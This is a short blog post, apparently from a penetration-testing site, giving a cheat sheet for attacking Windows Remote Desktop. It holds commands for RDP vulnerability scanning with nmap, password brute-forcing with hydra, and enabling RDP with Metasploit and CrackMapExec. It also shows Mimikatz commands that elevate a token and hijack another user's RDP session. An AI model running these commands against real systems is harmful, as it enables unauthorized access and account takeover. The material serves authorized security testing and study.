Welcome, today I am writing about RDP Penetration Testing fundamentals, I will explain how to enumerate Remote Desktop Service and how to use it to escalate privileges.

RDP Introduction

RDP Penetration Testing

RDP Enumeration

nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" 192.168.1.131 -p3389

Brute Force RDP

hydra -L userslist.txt -P wordlist.txt 192.168.1.131 rdp

Metasploit

use post/windows/mange/enable_rdp
set username rfs
set password Password123!
set session 1
exploit

CrackMapExec

crackmapexec smb '' -u '' -p '' -M rdp -o ACTION=enable

Post Exploitation

Connecting to RDP

xfreerdp /v:'' /u:'' /p:''
xfreerdp /v:'' /u:'' /p:'' +clipboard
#Maps specified folder on attacking machine to RDP host
xfreerdp /v:'' /u:'' /p:'' +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,share

Credential Dumping

RDP Session Hijacking

Invoke-Mimikatz -Command '"ts::sessions"'
Invoke-Mimikatz -Command '"token::elevate" "ts::remote /id:4"'

Socks5 over RDP

https://github.com/nccgroup/SocksOverRDP

RDP Exploits

Bluekeep

SMTP Penetration Testing

SNMP Penetration Testing

SSH Penetration Testing

NetBios Penetration Testing

FTP penetration testing

RDP Hacking

Oh hi there 👋 It’s nice to meet you.

Sign up to receive awesome content in your inbox, every month.

Read our privacy policy for more info.

PopLAbSec_Logo

Hacking tips!

We don’t spam! Read our privacy policy for more info.